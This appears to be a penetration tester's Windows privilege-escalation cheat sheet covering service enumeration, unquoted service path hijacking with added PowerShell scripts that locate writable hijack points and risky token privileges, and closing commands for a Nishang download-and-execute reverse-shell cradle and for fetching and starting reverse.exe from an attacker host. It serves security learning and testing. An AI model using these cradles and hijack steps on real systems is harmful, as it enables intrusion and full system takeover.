Windows

Service

Service Information

sc qc <service-name>

Start / stop a Windows service (from PowerShell type sc.exe, because sc is an alias for Set-Content there)

sc start/stop <service-name>

List all services

sc queryex type= service state= all

List all services with their binary path (PowerShell; Get-CimInstance Win32_Service returns the same properties on current systems where Get-WmiObject is deprecated)

Get-WmiObject win32_service | select Name, DisplayName, State, PathName | sort State

Append this to keep only running services:

| Where State -eq "Running"

File

Display the ACL of a file or directory

icacls <file>

Unquoted Service Path

C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

When the service starts, Windows resolves this path the way CreateProcess does: every space is treated as a possible end of the executable name, and the candidates are tried in the following order, the first one that exists being executed. So if the current user can write to any directory in the chain (C:\, C:\Program Files, C:\Program Files\A Subfolder, ...), a planted binary named as in 1 to 4 runs with the service's account, usually LocalSystem, the next time the service starts.

  1. C:\Program.exe

  2. C:\Program Files\A.exe

  3. C:\Program Files\A Subfolder\B.exe

  4. C:\Program Files\A Subfolder\B Subfolder\C.exe

  5. C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

source: below (highly recommended reading)

Check for unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """

The three findstr filters keep only auto-start services, drop anything under C:\Windows, and drop paths that are already quoted (""" is how a literal double quote is passed from cmd). wmic is deprecated and may be missing on current Windows 11 builds; Get-CimInstance Win32_Service gives the same data from PowerShell.
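The following PowerShell script is an added example, not code from the original page: it enumerates services the way the wmic one-liner does, expands each unquoted path into the candidate executables Windows would try first (the 1 to 4 order shown above), and then uses the ACL information that icacls would show to report which of those directories, or the service binary itself, the current user can write to. It assumes PowerShell 3 or later (Get-CimInstance) and approximates effective access by matching allow/deny ACEs against the SIDs in the current token; it does not account for ownership or for privileges such as SeRestorePrivilege.

```powershell
# Added example (not from the original page). Run as the low-privileged user
# whose escalation options you are assessing.

# SIDs of the current user and every group in its token, for ACE matching.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @{ $identity.User.Value = $true }
foreach ($g in $identity.Groups) { $MySids[$g.Value] = $true }

function Test-WriteAccess {
    # $true when an allow ACE for one of our SIDs grants WriteData/CreateFiles,
    # GENERIC_WRITE or GENERIC_ALL and no deny ACE for our SIDs takes it away.
    # Approximation: ownership and token privileges are ignored.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path } catch { return $false }
    $writeBits = 0x2 -bor 0x40000000 -bor 0x10000000   # WriteData | GENERIC_WRITE | GENERIC_ALL
    $allowed = $false
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if (-not $MySids.ContainsKey($ace.IdentityReference.Value)) { continue }
        $v = [int]$ace.FileSystemRights.value__          # raw mask, may contain generic bits
        if (($v -band $writeBits) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Get-ImageFile {
    # Strip service arguments: keep everything up to and including the first ".exe".
    param([string]$ImagePath)
    $idx = $ImagePath.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($idx -ge 0) { return $ImagePath.Substring(0, $idx + 4) }
    return $ImagePath.Trim()
}

function Get-UnquotedPathCandidates {
    # For C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
    # returns C:\Program.exe, C:\Program Files\A.exe, ...\B.exe, ...\C.exe,
    # i.e. the files Windows looks for before reaching the real binary.
    param([string]$ImagePath)
    $parts = (Get-ImageFile $ImagePath) -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Length; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Find-UnquotedServicePaths {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }      # empty or already quoted
        if ($path.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
        $candidates = @(Get-UnquotedPathCandidates $path)
        if ($candidates.Count -eq 0) { continue }                   # no spaces: nothing to hijack
        $writableDirs = @($candidates |
            ForEach-Object { Split-Path -Parent $_ } |
            Select-Object -Unique |
            Where-Object { Test-WriteAccess $_ })
        [PSCustomObject]@{
            Service        = $svc.Name
            StartMode      = $svc.StartMode
            RunsAs         = $svc.StartName
            ImagePath      = $path
            Candidates     = $candidates -join '; '
            WritableDirs   = $writableDirs -join '; '              # drop a candidate .exe here
            BinaryWritable = Test-WriteAccess (Get-ImageFile $path) # or overwrite the binary itself
        }
    }
}

Find-UnquotedServicePaths | Format-List
```

A hit with a non-empty WritableDirs and StartMode Auto (or a service you can restart) is the usual target; BinaryWritable is a separate, simpler finding that does not need an unquoted path at all, only a misconfigured ACL on the executable, which is why the icacls check above is worth running on every service binary.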

Which groups the user belongs to

whoami /groups

List the user's privileges

whoami /priv
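Reading the two whoami listings by eye is error-prone, so here is an added PowerShell example (not from the original page) that parses both in CSV form without headers, so it does not depend on the Windows display language, and reports what usually matters next: the integrity level, whether the Administrators group in the token is effective or UAC-filtered ("used for deny only"), and the token privileges that commonly lead to escalation. The selection of privileges and the one-line explanations are this editor's, not something the page defines.

```powershell
# Added example (not from the original page).

# Privileges worth looking for and what holding them lets a process do.
$InterestingPrivileges = @{
    'SeImpersonatePrivilege'        = 'impersonate clients after authentication'
    'SeAssignPrimaryTokenPrivilege' = 'replace the primary token of a new process'
    'SeBackupPrivilege'             = 'read any file regardless of ACL (e.g. registry hives)'
    'SeRestorePrivilege'            = 'write any file or registry key regardless of ACL'
    'SeDebugPrivilege'              = 'open any process, including LSASS'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any securable object'
    'SeLoadDriverPrivilege'         = 'load and unload device drivers'
    'SeManageVolumePrivilege'       = 'raw volume access'
}
# Mandatory label SIDs that whoami /groups lists as the integrity level.
$IntegrityLevels = @{
    'S-1-16-4096'  = 'Low';  'S-1-16-8192'  = 'Medium'
    'S-1-16-12288' = 'High'; 'S-1-16-16384' = 'System'
}

function Get-TokenGroups {
    # whoami /groups /fo csv /nh columns: group name, type, SID, attributes
    whoami /groups /fo csv /nh | ConvertFrom-Csv -Header Name, Type, SID, Attributes
}

function Get-TokenPrivileges {
    # whoami /priv /fo csv /nh columns: privilege name, description, state
    whoami /priv /fo csv /nh | ConvertFrom-Csv -Header Name, Description, State
}

function Get-TokenSummary {
    $groups    = @(Get-TokenGroups)
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)

    $label     = $groups | Where-Object { $IntegrityLevels.ContainsKey($_.SID) } | Select-Object -First 1
    $integrity = if ($label) { $IntegrityLevels[$label.SID] } else { 'unknown' }

    # Administrators (S-1-5-32-544) present in the token but IsInRole() false means the
    # group is "used for deny only": a UAC-filtered token that still needs elevation.
    $adminInToken   = [bool]($groups | Where-Object { $_.SID -eq 'S-1-5-32-544' })
    $adminEffective = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

    $privs = foreach ($p in Get-TokenPrivileges) {
        if ($InterestingPrivileges.ContainsKey($p.Name)) {
            [PSCustomObject]@{
                Privilege = $p.Name
                State     = $p.State   # "Disabled" only means not yet enabled; the holder can enable it
                Allows    = $InterestingPrivileges[$p.Name]
            }
        }
    }

    [PSCustomObject]@{
        User              = $identity.Name
        IntegrityLevel    = $integrity
        AdminGroupInToken = $adminInToken
        AdminEffective    = $adminEffective
        UacFiltered       = ($adminInToken -and -not $adminEffective)
        InterestingPrivs  = @($privs)
    }
}

$summary = Get-TokenSummary
$summary | Format-List User, IntegrityLevel, AdminGroupInToken, AdminEffective, UacFiltered
$summary.InterestingPrivs | Format-Table -AutoSize
```

UacFiltered set to true tells you the account is an administrator whose current process only carries a medium-integrity token, so the next step is elevation rather than a classic privilege escalation; a listed privilege in state Disabled is still yours, since a process may enable any privilege its token holds.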

Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.

Use the in-memory download-and-execute cradle (the script is fetched with DownloadString and run with iex, so nothing is written to disk; replace <yourwebserver>, [IP] and [PortNo.] with the host serving the script and your listener's address and port):

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

PowerShell

From the target, download a file served by the attacker (here an executable; the web server on port 8000 or 1337 is the attacker's own). Both commands write the file to the current directory, so unlike the in-memory cradle above they leave an artifact on disk:

powershell "(New-Object System.Net.WebClient).DownloadFile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
powershell Invoke-WebRequest -Uri http://10.8.30.155:1337/reverse.exe -Outfile reverse.exe

Start the downloaded file from cmd.exe

START file.exe
